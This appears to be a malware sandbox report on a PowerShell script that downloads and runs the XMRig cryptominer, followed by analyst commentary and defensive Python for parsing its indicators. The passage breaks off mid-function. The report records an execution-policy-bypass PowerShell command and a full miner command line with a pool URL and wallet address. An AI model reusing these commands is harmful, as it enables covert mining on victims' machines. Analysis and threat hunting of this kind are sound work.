| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4572-50-0x000001A615130000-0x000001A615150000-memory.dmp
memory/4572-51-0x000001A615180000-0x000001A6151A0000-memory.dmp
memory/4572-52-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-54-0x000001A616950000-0x000001A616970000-memory.dmp
memory/4572-53-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-55-0x000001A616970000-0x000001A616990000-memory.dmp
memory/4572-56-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-57-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-58-0x000001A616950000-0x000001A616970000-memory.dmp
memory/4572-59-0x000001A616970000-0x000001A616990000-memory.dmp
memory/4572-60-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-61-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-62-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-63-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-64-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-65-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-66-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-67-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-68-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-69-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-70-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-71-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-72-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-73-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-74-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-75-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-76-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-77-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-78-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-79-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-80-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-81-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-82-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win11-20240508-en
Max time kernel
293s
Max time network
306s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| 29 matches; the report records no description, indicator, process or target for any of them | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2400 wrote to memory of 3588 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2400 wrote to memory of 3588 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| IE | 52.111.236.22:443 | N/A | tcp |
Files
memory/2400-0-0x00007FFF21033000-0x00007FFF21035000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vcs4sksj.jwv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2400-9-0x0000022E6B040000-0x0000022E6B062000-memory.dmp
memory/2400-10-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp
memory/2400-11-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp
memory/2400-12-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp
memory/2400-13-0x00007FFF21033000-0x00007FFF21035000-memory.dmp
memory/2400-14-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp
memory/2400-16-0x0000022E6B0F0000-0x0000022E6B102000-memory.dmp
memory/2400-17-0x0000022E6B0E0000-0x0000022E6B0EA000-memory.dmp
memory/2400-20-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3588-49-0x0000019696D60000-0x0000019696D80000-memory.dmp
memory/2400-50-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp
memory/3588-51-0x0000019696DB0000-0x0000019696DD0000-memory.dmp
memory/3588-52-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-53-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-54-0x0000019698590000-0x00000196985B0000-memory.dmp
memory/3588-55-0x00000196985B0000-0x00000196985D0000-memory.dmp
memory/3588-56-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-57-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-58-0x0000019698590000-0x00000196985B0000-memory.dmp
memory/3588-59-0x00000196985B0000-0x00000196985D0000-memory.dmp
memory/3588-60-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-61-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-62-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-63-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-64-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-65-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-66-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-67-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-68-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-69-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-70-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-71-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-72-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-73-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-74-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-75-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-76-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-77-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-78-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-79-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-80-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-81-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-82-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
298s
Max time network
300s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| 26 matches; the report records no description, indicator, process or target for any of them | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4604 wrote to memory of 2924 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4604 wrote to memory of 2924 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 20.231.121.79:80 | N/A | tcp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.56.20.217.in-addr.arpa | udp |
Files
memory/4604-4-0x00007FFDF4DD3000-0x00007FFDF4DD4000-memory.dmp
memory/4604-5-0x000002369AC70000-0x000002369AC92000-memory.dmp
memory/4604-8-0x00007FFDF4DD0000-0x00007FFDF57BC000-memory.dmp
memory/4604-9-0x00000236B3330000-0x00000236B33A6000-memory.dmp
memory/4604-10-0x00007FFDF4DD0000-0x00007FFDF57BC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_plcgwmlh.hqb.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4604-25-0x00007FFDF4DD0000-0x00007FFDF57BC000-memory.dmp
memory/4604-29-0x00007FFDF4DD3000-0x00007FFDF4DD4000-memory.dmp
memory/4604-30-0x00007FFDF4DD0000-0x00007FFDF57BC000-memory.dmp
memory/4604-31-0x00007FFDF4DD0000-0x00007FFDF57BC000-memory.dmp
memory/4604-32-0x00007FFDF4DD0000-0x00007FFDF57BC000-memory.dmp
memory/4604-52-0x00000236B3100000-0x00000236B3112000-memory.dmp
memory/4604-65-0x00000236B30E0000-0x00000236B30EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2924-94-0x000001AED6FC0000-0x000001AED6FE0000-memory.dmp
memory/2924-95-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-96-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-97-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-98-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-99-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-100-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-101-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-102-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-103-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-104-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-105-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-106-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-107-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-108-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-109-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-110-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-111-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-112-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-113-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-114-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-115-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-116-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-117-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-118-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-119-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
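The Files list above is mostly repeated memory dumps, but parsed it says two useful things. The largest range dumped from the xmrig PID (2924 here) is 0xC33000 bytes, and the same 0xC33000 span appears for the xmrig PID in all five detonations on this page at a different base each time, which is what a fixed-size image under ASLR looks like and is a property a hunter can compare against a live process. And the __PSScriptPolicyTest_*.ps1 file is not a payload: PowerShell writes it to %TEMP% at startup to probe whether an application-control policy (AppLocker/WDAC) would block script execution. The digests this behavioral22 run records for it are exactly those of the single byte 1, which the hash check below confirms (the copy in the other runs, d17fe0…, has content the report does not show). The Python below is an added example, not part of the report: it parses dump names and hash rows in the page's own layout, de-duplicates regions per PID, and checks recorded digests against known content and a SHA256 blocklist.

```python
"""Parse the Files section of this report: memory-dump names per PID and dropped-file hashes."""
import hashlib
import re
from collections import Counter, defaultdict

# Lines copied from this report's behavioral22 Files list (abridged: the full list repeats the
# same xmrig range dozens of times, which is exactly what the de-duplication below is for).
FILES_SECTION = r"""
memory/4604-4-0x00007FFDF4DD3000-0x00007FFDF4DD4000-memory.dmp
memory/4604-5-0x000002369AC70000-0x000002369AC92000-memory.dmp
memory/4604-8-0x00007FFDF4DD0000-0x00007FFDF57BC000-memory.dmp
memory/4604-10-0x00007FFDF4DD0000-0x00007FFDF57BC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_plcgwmlh.hqb.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
memory/2924-94-0x000001AED6FC0000-0x000001AED6FE0000-memory.dmp
memory/2924-95-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-96-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-97-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
"""

_DUMP = re.compile(r'^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$')
_PATH = re.compile(r'^[A-Za-z]:\\')
_HASH = re.compile(r'^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$')


def parse_files_section(text):
    """Return (dumps, files): one record per dump line and a path -> {algo: hexdigest} map."""
    dumps, files, current = [], {}, None
    for line in text.splitlines():
        line = line.strip()
        if m := _DUMP.match(line):
            pid, seq, start, end = m.groups()
            dumps.append({'pid': int(pid), 'seq': int(seq),
                          'start': int(start, 16), 'end': int(end, 16)})
        elif _PATH.match(line):           # a dropped-file path; its hash rows follow
            current = line
            files[current] = {}
        elif (m := _HASH.match(line)) and current:
            files[current][m.group(1).lower()] = m.group(2).lower()
    return dumps, files


def regions_by_pid(dumps):
    """Distinct (start, end) ranges per PID and how many dumps were taken of each."""
    out = defaultdict(Counter)
    for d in dumps:
        out[d['pid']][(d['start'], d['end'])] += 1
    return dict(out)


def largest_region(dumps, pid):
    """(start, end, size) of the biggest range dumped from a PID; for xmrig that is the image."""
    start, end = max(((d['start'], d['end']) for d in dumps if d['pid'] == pid),
                     key=lambda r: r[1] - r[0])
    return start, end, end - start


def matches_content(hashes, data):
    """True when every digest recorded for a file is the digest of `data`."""
    return bool(hashes) and all(hashlib.new(algo, data).hexdigest() == hexd
                                for algo, hexd in hashes.items())


def known_bad(files, blocklist):
    """Paths whose SHA256 is on a blocklist (here: the xmrig.exe hash this report records)."""
    return sorted(p for p, h in files.items() if h.get('sha256') in blocklist)


if __name__ == '__main__':
    dumps, files = parse_files_section(FILES_SECTION)
    for pid, regions in regions_by_pid(dumps).items():
        print(pid, {f'0x{s:X}-0x{e:X}': n for (s, e), n in regions.items()})
    print('xmrig image size: 0x%X' % largest_region(dumps, 2924)[2])
    print('policy probe is the byte "1":',
          matches_content(files[next(p for p in files if '__PSScriptPolicyTest_' in p)], b'1'))
```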
Analysis: behavioral29
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10v2004-20240508-en
Max time kernel
297s
Max time network
295s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| 29 matches; the report records no description, indicator, process or target for any of them | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4268 wrote to memory of 8 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4268 wrote to memory of 8 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 113.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.65.42.20.in-addr.arpa | udp |
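Most rows in the table above are not indicators. Every 8.8.8.8:53 row whose name ends in in-addr.arpa is the sandbox resolving PTR records for peers it saw, and the g.bing.com and www.bing.com rows are Microsoft background traffic from the win10v2004 image. What remains is the two-stage picture: a download from github.com and objects.githubusercontent.com (shared hosting, so a hunt indicator rather than something to block) and the pool connection to rx.unmineable.com at 161.35.34.195:443. The Python below is an added example, not part of this report: it parses the table in the page's own pipe layout and sorts rows into those buckets. The pool host comes from the xmrig command line in the report; the background and shared-hosting suffix lists are constructed allowlists for illustration; and the 52.111.229.43 row (copied from the behavioral19 table, which records no domain for it) shows how an unattributed endpoint is set aside for attribution rather than dropped or blocked.

```python
"""Sort the rows of this report's Network table into sandbox noise and actionable IOCs."""
import ipaddress
import re

# Rows copied from this report's behavioral29 Network table (abridged), in the page's own layout.
NETWORK_TABLE = """
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
"""
# One row with no domain, copied from the behavioral19 table, to exercise the unattributed path.
NETWORK_TABLE += "| US | 52.111.229.43:443 | N/A | tcp |\n"

# Pool host taken from the xmrig command line in this report; the two suffix lists are
# constructed allowlists for this example, not from the page.
POOL_HOSTS = frozenset({'rx.unmineable.com'})
SHARED_HOSTING = ('github.com', 'githubusercontent.com')    # payload stage: hunt on it, do not block
BACKGROUND = ('bing.com', 'microsoft.com', 'windowsupdate.com', 'msftconnecttest.com')

_ROW = re.compile(r'^\|\s*([A-Z]{2})\s*\|\s*([^|]+?)\s*\|\s*([^|]*?)\s*\|\s*(tcp|udp)\s*\|$')


def _under(domain, suffixes):
    return any(domain == s or domain.endswith('.' + s) for s in suffixes)


def categorize(domain, pool_hosts=POOL_HOSTS):
    if domain.endswith('.in-addr.arpa'):
        return 'noise-ptr'          # the sandbox's own reverse lookups of peers it saw
    if not domain or domain == 'N/A':
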